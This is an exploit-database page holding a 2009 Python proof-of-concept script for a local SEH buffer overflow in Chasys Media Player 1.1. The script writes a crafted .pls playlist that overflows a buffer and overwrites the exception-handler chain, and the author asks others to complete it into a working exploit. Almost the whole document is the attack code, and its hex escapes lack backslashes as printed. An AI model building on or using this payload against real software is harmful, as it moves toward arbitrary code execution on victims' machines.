Chasys Media Player 1.1 (.pls) Local Buffer Overflow PoC (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Chasys Media Player 1.1 (.pls) Local Buffer Overflow PoC (SEH)
# Published : 2009-03-18
# Author : zAx
# Previous Title : SW-HTTPD Server 0.x Remote Denial of Service Exploit
# Next Title : Serv-U 7.4.0.1 (SMNT) Denial of Service Exploit (post auth)

#!/usr/bin/python
# Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC
# SEH And NEXT_SEH are Overwritten but shellcode doesn't executed !!!
# I have tried a lot of Addresses .
# Waitting for the Exploit from someone .
# Download : http://www.jpcha2.com/setup/chasys_media_player.zip
print "  Chasys Media Player 1.1 (.pls) Local Buffer Overflow (SEH) PoC"
print "  Discovered By : zAx"
print "  Contact : ThE-zAx@Hotmail.Com"
header = "x5Bx70x6Cx61x79x6Cx69x73x74x5Dx0Ax4Ex75x6Dx62x65x72x4Fx66x45x6Ex74x72x69x65x73x3Dx31x0Ax46x69x6Cx65x31x3D"
junk = "x41"*2024
next_seh = "x42"*4
seh = "x43"*4
other_data = "xCC"*800
ex = header + junk + next_seh + seh + other_data
file=open("zAx.pls","w")
file.write(ex)
file.close()

# www.Syue.com [2009-03-18]